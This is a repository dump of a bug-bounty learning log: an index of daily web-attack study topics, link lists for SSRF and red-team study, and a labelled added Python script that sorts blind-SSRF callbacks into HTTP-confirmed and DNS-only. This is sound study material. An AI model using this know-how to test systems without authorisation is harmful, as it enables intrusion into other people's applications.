Repository: Imran407704/Learn365 Branch: main Commit: 25a810c05267 Files: 146 Total size: 132.1 KB Directory structure: gitextract_nhcxwvz6/ ├── README.md └── Resources/ ├── Day 01 Task.md ├── Day 02 Task.md ├── Day 03 Task.md ├── Day 04 Task.md ├── Day 05 Task.md ├── Day 06 Task.md ├── Day 07 Task.md ├── Day 08 Task.md ├── Day 09 Task.md ├── Day 10 Task.md ├── Day 100 Task.md ├── Day 101 Task.md ├── Day 102 Task.md ├── Day 103 Task.md ├── Day 104 Task.md ├── Day 105 Task.md ├── Day 106 Task.md ├── Day 107 Task.md ├── Day 108 Task.md ├── Day 109 Task.md ├── Day 11 Task.md ├── Day 110 Task.md ├── Day 111 Task.md ├── Day 112 Task.md ├── Day 113 Task.md ├── Day 114 Task.md ├── Day 115 Task.md ├── Day 116 Task.md ├── Day 117 Task.md ├── Day 118 Task.md ├── Day 119 Task.md ├── Day 12 Task.md ├── Day 120 Task.md ├── Day 121 Task.md ├── Day 122 Task.md ├── Day 123 Task.md ├── Day 124 Task.md ├── Day 125 Task.md ├── Day 126 Task.md ├── Day 127 Task.md ├── Day 128 Task.md ├── Day 129 Task.md ├── Day 13 Task.md ├── Day 130 Task.md ├── Day 131 Task.md ├── Day 132 Task.md ├── Day 133 Task.md ├── Day 134 Task.md ├── Day 135 Task.md ├── Day 136 Task.md ├── Day 137 Task.md ├── Day 138 Task.md ├── Day 139 Task.md ├── Day 14 Task.md ├── Day 140 Task.md ├── Day 141 Task.md ├── Day 142 Task.md ├── Day 143 Task.md ├── Day 144 Task.md ├── Day 145 Task.md ├── Day 15 Task.md ├── Day 16 Task.md ├── Day 17 Task.md ├── Day 18 Task.md ├── Day 19 Task.md ├── Day 20 Task.md ├── Day 21 Task.md ├── Day 22 Task.md ├── Day 23 Task.md ├── Day 24 Task.md ├── Day 25 Task.md ├── Day 26 Task.md ├── Day 27 Task.md ├── Day 28 Task.md ├── Day 29 Task.md ├── Day 30 Task.md ├── Day 31 Task.md ├── Day 32 Task.md ├── Day 33 Task.md ├── Day 34 Task.md ├── Day 35 Task.md ├── Day 36 Task.md ├── Day 37 Task.md ├── Day 38 Task.md ├── Day 39 Task.md ├── Day 40 Task.md ├── Day 41 Task.md ├── Day 42 Task.md ├── Day 43 Task.md ├── Day 44 Task.md ├── Day 45 Task.md ├── Day 46 Task.md ├── Day 47 Task.md ├── Day 48 
Task.md ├── Day 49 Task.md ├── Day 50 Task.md ├── Day 51 Task.md ├── Day 52 Task.md ├── Day 53 Task.md ├── Day 54 Task.md ├── Day 55 Task.md ├── Day 56 Task.md ├── Day 57 Task.md ├── Day 58 Task.md ├── Day 59 Task.md ├── Day 60 Task.md ├── Day 61 Task.md ├── Day 62 Task.md ├── Day 63 Task.md ├── Day 64 Task.md ├── Day 65 Task.md ├── Day 66 Task.md ├── Day 67 Task.md ├── Day 68 Task.md ├── Day 69 Task.md ├── Day 70 Task.md ├── Day 71 Task.md ├── Day 72 Task.md ├── Day 73 Task.md ├── Day 74 Task.md ├── Day 75 Task.md ├── Day 76 Task.md ├── Day 77 Task.md ├── Day 78 Task.md ├── Day 79 Task.md ├── Day 80 Task.md ├── Day 81 Task.md ├── Day 82 Task.md ├── Day 83 Task.md ├── Day 84 Task.md ├── Day 85 Task.md ├── Day 86 Task.md ├── Day 87 Task.md ├── Day 88 Task.md ├── Day 89 Task.md ├── Day 90 Task.md ├── Day 91 Task.md ├── Day 92 Task.md ├── Day 93 Task.md ├── Day 94 Task.md ├── Day 95 Task.md ├── Day 96 Task.md ├── Day 97 Task.md ├── Day 98 Task.md └── Day 99 Task.md

================================================ FILE CONTENTS ================================================

================================================ FILE: README.md ================================================

[#Learn365](https://twitter.com/search?q=%23learn365&src=typeahead_click)

The purpose of the [#Learn365](https://twitter.com/search?q=%23learn365&src=typeahead_click) collection is to create informational content in multiple formats and share it with the community to support knowledge creation and learning.
Inspired by [@harshbothra_](https://twitter.com/harshbothra_)

## Resources

| Days | Topic |
| ----------------- | ------------------------------------------------------------------ |
| Day 1 | [SSRF, Red Team](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2001%20Task.md) |
| Day 2 | [SSRF, Red Team, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2002%20Task.md) |
| Day 3 | [SSRF, Red Team, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2003%20Task.md) |
| Day 4 | [Broken Link Hijacking, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2004%20Task.md) |
| Day 5 | [Blind XSS, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2005%20Task.md) |
| Day 6 | [log4j, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2006%20Task.md) |
| Day 7 | [Password Reset link does not expire, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2007%20Task.md) |
| Day 8 | [DMARC, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2008%20Task.md) |
| Day 9 | [CSRF, Linux PrivEsc](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2009%20Task.md) |
| Day 10 | [Clickjacking, Linux PrivEsc](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2010%20Task.md) |
| Day 11 | [Live Bug Hunting, Linux PrivEsc](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2011%20Task.md) |
| Day 12 | [Bug Bounty Wordlist, Linux PrivEsc](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2012%20Task.md) |
| Day 13 | [OWASP Web Application Security Testing, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2013%20Task.md) |
| Day 14 | [4.1.2 OWASP Fingerprint Web Server, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2014%20Task.md) |
| Day 15 | [4.1.3 OWASP Review Webserver Metafiles for Information Leakage, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2015%20Task.md) |
| Day 16 | [4.1.4 Enumerate Applications on Webserver](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2016%20Task.md) |
| Day 17 | [4.1.5 Review Webpage Content for Information Leakage, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2017%20Task.md) |
| Day 18 | [4.1.6 Identify Application Entry Points](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2018%20Task.md) |
| Day 19 | [4.1.7 Map Execution Paths Through Application, Github Recon](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2019%20Task.md) |
| Day 20 | [4.1.8 Fingerprint Web Application Framework, Recon Techniques](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2020%20Task.md) |
| Day 21 | [4.1.9, 4.1.10 Map Application Architecture, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2021%20Task.md) |
| Day 22 | [4.2 Configuration and Deployment Management Testing, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2022%20Task.md) |
| Day 23 | [4.2.2 Test Application Platform Configuration, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2023%20Task.md) |
| Day 24 | [4.2.3 Test File Extensions Handling for Sensitive Information, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2024%20Task.md) |
| Day 25 | [4.2.4 Review Old Backup and Unreferenced Files for Sensitive Information, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2025%20Task.md) |
| Day 26 | [4.2.5 Enumerate Infrastructure and Application Admin Interfaces, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2026%20Task.md) |
| Day 27 | [4.2.6 Test HTTP Methods (with Video), THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2027%20Task.md) |
| Day 28 | [4.2.7 Test HTTP Strict Transport Security (HSTS), THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2028%20Task.md) |
| Day 29 | [4.2.8 Test RIA Cross Domain Policy, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2029%20Task.md) |
| Day 30 | [4.2.9 Test File Permission, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2030%20Task.md) |
| Day 31 | [4.2.10 Test for Subdomain Takeover, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2031%20Task.md) |
| Day 32 | [4.2.11 Test Cloud Storage, THM Room, eJPT](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2032%20Task.md) |
| Day 33 | [4.2.12 Test for Content Security Policy, THM Room, eJPT](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2033%20Task.md) |
| Day 34 | [4.3.1 Test Role Definitions, THM Room, eJPT](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2034%20Task.md) |
| Day 35 | [4.3.2 Test User Registration Process](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2035%20Task.md) |
| Day 36 | [4.3.3 Test Account Provisioning Process](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2036%20Task.md) |
| Day 37 | [4.3.4 Testing for Account Enumeration and Guessable User Account](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2037%20Task.md) |
| Day 38 | [4.3.5 Testing for Weak or Unenforced Username Policy, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2038%20Task.md) |
| Day 39 | [4.4.1 Testing for Credentials Transported over an Encrypted Channel](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2039%20Task.md) |
| Day 40 | [4.4.2 Testing for Default Credentials](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2040%20Task.md) |
| Day 41 | [CSRF](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2041%20Task.md) |
| Day 42 | [Open Redirect](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2042%20Task.md) |
| Day 43 | [log4j](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2043%20Task.md) |
| Day 44 | [JWT attacks](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2044%20Task.md) |
| Day 45 | [Content Discovery](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2045%20Task.md) |
| Day 46 | [IDOR](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2046%20Task.md) |
| Day 47 | [Account takeover](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2047%20Task.md) |
| Day 48 | [RCE on a Java Web Application](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2048%20Task.md) |
| Day 49 | [Dependency Confusion](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2049%20Task.md) |
| Day 50 | [Automate Blind XSS](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2050%20Task.md) |
| Day 51 | [Finding And Exploiting S3 Amazon Buckets For Bug Bounties](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2051%20Task.md) |
| Day 52 | [Web Cache Poisoning attack](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2052%20Task.md) |
| Day 53 | [Unique Case for Price Manipulation](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2053%20Task.md) |
| Day 54 | [Account takeover via the Password Reset Functionality](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2054%20Task.md) |
| Day 55 | [API Token Hijacking Through Clickjacking, THM Room](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2055%20Task.md) |
| Day 56 | [API Exploitation --→ Business Logic Bug](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2056%20Task.md) |
| Day 57 | [Attended Infosec Community Conference on: Android Static Analysis](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2057%20Task.md) |
| Day 58 | [Finding bugs on NFT website for fun & Profit by zseano](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2058%20Task.md) |
| Day 59 | [EXIF Geolocation Data Not Stripped From Uploaded Images](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2059%20Task.md) |
| Day 60 | [Thick Client Pentesting](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2060%20Task.md) |
| Day 61 | [Conduct a Penetration Test Like a Pro in 6 Phases](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2061%20Task.md) |
| Day 62 | [Firewall Penetration Testing](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2062%20Task.md) |
| Day 63 | [Host Discovery & Vulnerability Scanning With Nessus](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2063%20Task.md) |
| Day 64 | [AWS Web Application Firewall (WAF), 5 Pentesterlab Exercises](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2064%20Task.md) |
| Day 65 | [Introduction To Pentesting - Enumeration, 6 Pentesterlab Exercises](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2065%20Task.md) |
| Day 66 | [Bypassing CSRF Protection, 5 Pentesterlab Exercises](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2066%20Task.md) |
| Day 67 | [HTML Injection](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2067%20Task.md) |
| Day 68 | [Exploiting SQL Injection, Completed Pentesterlab Unix Badge](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2068%20Task.md) |
| Day 69 | [A Weird Price Tampering Vulnerability, Security Operations Center (SOC)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2069%20Task.md) |
| Day 70 | [A Summary of OAuth 2.0 Attack Methods](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2070%20Task.md) |
| Day 71 | [6 Methods to bypass CSRF protection on a web application](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2071%20Task.md) |
| Day 72 | [Two-factor authentication security testing and possible bypasses](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2072%20Task.md) |
| Day 73 | [10 Types of Web Vulnerabilities that are Often Missed, Understanding BOLA](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2073%20Task.md) |
| Day 74 | [My First Bug Bounty: SQL Injection, SQL INJECTION VULNERABILITY](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2074%20Task.md) |
| Day 75 | [Dank Writeup On Broken Access Control, Bug bounty tips for broken access control on BurpSuite Part 1](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2075%20Task.md) |
| Day 76 | [SSRF in PDF Renderer using SVG, Bypassing 2FA using OpenID Misconfiguration](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2076%20Task.md) |
| Day 77 | [Easy IDOR hunting with Autorize?, HOW I hacked thousands of subdomains](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2077%20Task.md) |
| Day 78 | [A business logic error bug worth 600$, 5 Methods to bypass Authentication (OTP)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2078%20Task.md) |
| Day 79 | [How did I earn €€€€ by breaking the back-end logic of the server, How to find IDOR Privilege escalation](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2079%20Task.md) |
| Day 80 | [Account Takeover via Web Cache Poisoning based Reflected XSS, A Pentester's Guide to Server Side Template Injection](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2080%20Task.md) |
| Day 81 | [Account Takeover: From zero to System Admin using basic skills, Apache Example Servlet leads to $$$$](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2081%20Task.md) |
| Day 82 | [The easiest $2500 I got from a bug bounty program, A Pentester's Guide to File Inclusion](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2082%20Task.md) |
| Day 83 | [How I bypassed disable_functions in php to get a remote shell, JWTs - Patterns & Anti-patterns](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2083%20Task.md) |
| Day 84 | [Finding Your Next Bug: GraphQL, No Rate Limit - 2K$ Bounty](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2084%20Task.md) |
| Day 85 | [Facebook email disclosure and account takeover, How to learn anything in Computer Science or Cybersecurity](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2085%20Task.md) |
| Day 86 | [Hacking banks with race conditions, Exploiting a Race Condition Vulnerability](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2086%20Task.md) |
| Day 87 | [A Comprehensive Guide to Broken Access Control, Never leave this tip while hunting Broken Access Control, POC](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2087%20Task.md) |
| Day 88 | [A Journey from IDOR to Account Takeover, Exploiting open redirect - Whitelist bypass using Salesforce environment](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2088%20Task.md) |
| Day 89 | [Union Based SQL Injection — Bug Hunting, Bypass confirmation to add payment method](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2089%20Task.md) |
| Day 90 | [Exploiting cross-site scripting in Referer header, XSS via X-Forwarded-Host header](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2090%20Task.md) |
| Day 91 | [How I bypassed 403 forbidden domain using a simple trick, Deleting account via support ticket](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2091%20Task.md) |
| Day 92 | [Bypassing SSRF Protection to Exfiltrate AWS Metadata from LarkSuite, WordPress < 5.8.3 - Object Injection Vulnerability](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2092%20Task.md) |
| Day 93 | [0-day Cross Origin Request Forgery vulnerability in Grafana 8.x](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2093%20Task.md) |
| Day 94 | [GOT ACCESS TO DOTA 2 ADMIN PANEL BY EXPLOITING IN-GAME FEATURE](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2094%20Task.md) |
| Day 95 | [How I escalated RFI into LFI](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2095%20Task.md) |
| Day 96 | [Stumbling upon a new way to exploit authorization bypass in Jira](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2096%20Task.md) |
| Day 97 | [Clickjacking on Google MyAccount Worth 7,500$](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2097%20Task.md) |
| Day 98 | [Info Disclosure and SQLi Writeup](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2098%20Task.md) |
| Day 99 | [CSRF to HTML INJECTION which results in USER CREDENTIALS Stealing](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%2099%20Task.md) |
| Day 100 | [RCE with Flask Jinja Template Injection](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20100%20Task.md) |
| Day 101 | [How I could have hacked your Uber account](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20101%20Task.md) |
| Day 102 | [Bug Bounty Live Recon - Linked / JS Discovery!](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20102%20Task.md) |
| Day 103 | [HTTP Request Smuggling on business.apple.com and Others](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20103%20Task.md) |
| Day 104 | [SVG SSRFs and saga of bypasses, A Detailed Guide on Cewl](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20104%20Task.md) |
| Day 105 | [How a YouTube Video lead to pwning a web application via SQL Injection worth $4324 bounty](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20105%20Task.md) |
| Day 106 | [XSS, HTML Injection and File Upload Bypass in HUAWEI Subdomain](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20106%20Task.md) |
| Day 107 | [How Token Misconfiguration can lead to account takeover](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20107%20Task.md) |
| Day 108 | [How to hack any Payment Gateway?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20108%20Task.md) |
| Day 109 | [Race Condition bypassing team limit](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20109%20Task.md) |
| Day 110 | [Bypass Apple Corp SSO on Apple Admin Panel](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20110%20Task.md) |
| Day 111 | [The Unusual Case of Status code 301 Redirection to AWS Security Credentials Compromise](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20111%20Task.md) |
| Day 112 | [Find security bugs while you sleep! Using nuclei templates, and more..](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20112%20Task.md) |
| Day 113 | [Getting access to disabled/hidden features with the help of Burpsuite Match and Replace settings](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20113%20Task.md) |
| Day 114 | [Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router (PSV-2022–0044)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20114%20Task.md) |
| Day 115 | [How I chained two vulnerabilities to steal credit card details?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20115%20Task.md) |
| Day 116 | [How I Made The BBC Hall Of Fame 3 Times](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20116%20Task.md) |
| Day 117 | [Improper cookie not expiring after logout!](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20117%20Task.md) |
| Day 118 | [Open-Redirects, What are you doing wrong when you fail at bug bounties?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20118%20Task.md) |
| Day 119 | [Bypassing WAF for $2222](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20119%20Task.md) |
| Day 120 | [Subdomain Takeover using Mobile??](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20120%20Task.md) |
| Day 121 | [Fuzzing and credentials leakage.. awesome bug hunting writeup](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20121%20Task.md) |
| Day 122 | [OTP bypass with response manipulation.](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20122%20Task.md) |
| Day 123 | No task today, enjoy the Eid festival 🥳😊😃 |
| Day 124 | [A Bug Bounty Hunter's Guide to IDOR Vulnerabilities](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20124%20Task.md) |
| Day 125 | [How I got a lousy T-Shirt from the Dutch Government.](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20125%20Task.md) |
| Day 126 | [Hack the Hackers](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20126%20Task.md) |
| Day 127 | [The $16,000 Dev Mistake](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20127%20Task.md) |
| Day 128 | [Denial of Service through …](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20128%20Task.md) |
| Day 129 | [How I found a vulnerability that leads to accessing any user's sensitive data and got $500](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20129%20Task.md) |
| Day 130 | [ToolTime - Cloud Recon 1](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20130%20Task.md) |
| Day 131 | [A Fun SSRF through a Headless Browser](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20131%20Task.md) |
| Day 132 | [2FA Bypass in PickMyCareer.in](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20132%20Task.md) |
| Day 133 | [Exploiting Google Maps API keys for profit](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20133%20Task.md) |
| Day 134 | [Creator Studio's api endpoint is vulnerable to IDOR, exposes "p40_earnings_usd":$$$](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20134%20Task.md) |
| Day 135 | [I have 1% chance to hack this company](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20135%20Task.md) |
| Day 136 | [HTTP Request Smuggling: Part-1 (Concepts)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20136%20Task.md) |
| Day 137 | [Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20137%20Task.md) |
| Day 138 | [Can analyzing javascript files lead to remote code execution?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20138%20Task.md) |
| Day 139 | [My New Discovery In Oracle E-Business Login Panel That Allowed Access To All Employees' Information & In Some Cases Passwords At More Than 1000 Companies](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20139%20Task.md) |
| Day 140 | [Origin IP found, WAF Cloudflare Bypass](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20140%20Task.md) |
| Day 141 | [MFA (Multi-Factor Authentication)](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20141%20Task.md) |
| Day 142 | [Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20142%20Task.md) |
| Day 143 | [Does ms15-034 still exist today?](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20143%20Task.md) |
| Day 144 | [How I managed to take over any account that visits my profile with Stored XSS](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20144%20Task.md) |
| Day 145 | [The Bucket's Got a Hole in it](https://github.com/Imran407704/Learn365/blob/main/Resources/Day%20145%20Task.md) |

================================================ FILE: Resources/Day 01 Task.md ================================================

Day 1 Task

Writeup :- SSRF
https://infosecwriteups.com/story-of-a-really-cool-ssrf-bug-cf88a3800efc
https://medium.com/@shahjerry33/blind-ssrf-the-hide-seek-game-da9d0ecef2fb

SSRF Tip by Shah Jerry

When testing for blind SSRF it is common to find a DNS lookup for the given Burp Collaborator domain but no HTTP request. This happens because the application attempted to make an HTTP request to the domain, which caused the initial DNS lookup, but the actual HTTP request was blocked by network-level filtering. If you find only the DNS lookup or DNS query, it is not a vulnerability; it is mandatory to have the HTTP response, which is what makes it a valid vulnerability.

---

Red Team :- https://youtu.be/EIHLXWnK1Dw by @HackerSploit

================================================ FILE: Resources/Day 02 Task.md ================================================

Day 2 Task

Red Team : What is MITRE ATT&CK?
MITRE ATT&CK Framework by @Infosec_Train: https://youtube.com/watch?v=IsPArM8xKAM

---

SSRF :
https://medium.com/@rafaelrodripaz/ssrf-in-import-file-function-d0f1c6397262
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-2-a085ec4332c0
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-3-b0f5997e3739

---

THM room : https://tryhackme.com/room/redteamrecon
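The SSRF tip in Day 1 above turns on one distinction: a DNS lookup for your Collaborator host versus an HTTP request actually reaching it. The script below is an added example, not part of the Learn365 repo or of Shah Jerry's writeup. It reads out-of-band interaction records in a simplified, constructed log format (Burp Collaborator's real export looks different), groups them by the unique subdomain planted in each parameter, and labels each payload `http_confirmed`, `dns_only` or `no_callback`, so only the first group goes into the report. The zone `oast.example`, the payload ids, the injection points and the source IPs are all made up for the example.

```python
"""Added example (not from the Learn365 repo): triage out-of-band callbacks for blind SSRF.

A DNS lookup for your Collaborator host only proves that *something* resolved the
name; the HTTP request reaching the host is what proves the server fetched the URL.
This groups interaction records by the unique subdomain planted in each payload and
labels every payload http_confirmed, dns_only or no_callback.
The log format, zone, payload ids and IPs are all constructed for this example.
"""
import re
from collections import defaultdict
from typing import Optional

OAST_ZONE = "oast.example"  # constructed stand-in for your Collaborator / interactsh zone

# payload id -> where it was injected; you record this when you send the payloads
PAYLOADS = {
    "r3k2q1": "POST /import  url=",
    "z9f8m2": "GET /avatar?src=",
    "h7n4p0": "Referer header",
}

# Constructed records: "<timestamp> <PROTO> <detail> host=<fqdn> from=<ip>"
INTERACTIONS = """\
2022-01-05T10:21:03Z DNS  A    host=r3k2q1.oast.example from=203.0.113.10
2022-01-05T10:21:03Z HTTP GET / host=r3k2q1.oast.example from=203.0.113.10
2022-01-05T10:21:09Z DNS  A    host=z9f8m2.oast.example from=198.51.100.7
2022-01-05T10:21:09Z DNS  AAAA host=z9f8m2.oast.example from=198.51.100.7
2022-01-05T10:22:41Z DNS  A    host=unrelated.example.net from=192.0.2.9
"""

RECORD = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>DNS|HTTP|HTTPS|SMTP)\s+.*?host=(?P<host>\S+)\s+from=(?P<src>\S+)"
)


def payload_id(host: str, zone: str = OAST_ZONE) -> Optional[str]:
    """Label directly under the OAST zone, e.g. 'x.r3k2q1.oast.example' -> 'r3k2q1'."""
    if not host.endswith("." + zone):
        return None
    return host[: -len(zone) - 1].split(".")[-1]


def triage(records: str, payloads: dict = PAYLOADS) -> dict:
    """Return {payload_id: {"where", "protocols", "sources", "verdict"}} for every payload sent."""
    seen = defaultdict(lambda: {"protocols": set(), "sources": set()})
    for line in records.splitlines():
        m = RECORD.match(line)
        if not m:
            continue
        pid = payload_id(m.group("host"))
        if pid is None:            # noise: not under our zone
            continue
        seen[pid]["protocols"].add(m.group("proto"))
        seen[pid]["sources"].add(m.group("src"))

    report = {}
    for pid, where in payloads.items():
        protos = seen[pid]["protocols"] if pid in seen else set()
        if protos & {"HTTP", "HTTPS"}:
            verdict = "http_confirmed"   # the server fetched our URL: report this one
        elif protos == {"DNS"}:
            verdict = "dns_only"         # name resolved, request never arrived: egress filtered, not SSRF
        elif protos:
            verdict = "other"            # e.g. SMTP-only callback: investigate separately
        else:
            verdict = "no_callback"
        report[pid] = {
            "where": where,
            "protocols": protos,
            "sources": seen[pid]["sources"] if pid in seen else set(),
            "verdict": verdict,
        }
    return report


if __name__ == "__main__":
    for pid, info in triage(INTERACTIONS).items():
        print(f"{pid}  {info['verdict']:15} {info['where']:18} "
              f"protocols={sorted(info['protocols'])} from={sorted(info['sources'])}")
```

The `sources` set is worth keeping in the report: a DNS-only hit from an IP that is not the application server (a mail scanner, a link previewer, a recursive resolver) is one more reason not to file it as SSRF.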
================================================ FILE: Resources/Day 03 Task.md ================================================

Day 3 Task

SSRF PoC
https://youtube.com/playlist?list=PL9VLN4DOjAsjjAZiPf_vbGp9eGufX7lKY

eJPT resources by [@grumpzsux](https://twitter.com/grumpzsux)
https://github.com/grumpzsux/eJPT-Notes/

THM room
https://tryhackme.com/room/phishingemails1tryoe

Red Team by [@q0phi80](https://twitter.com/q0phi80), from 00:00:00 to 00:59:59
https://youtube.com/watch?v=OtcP8c4wZys

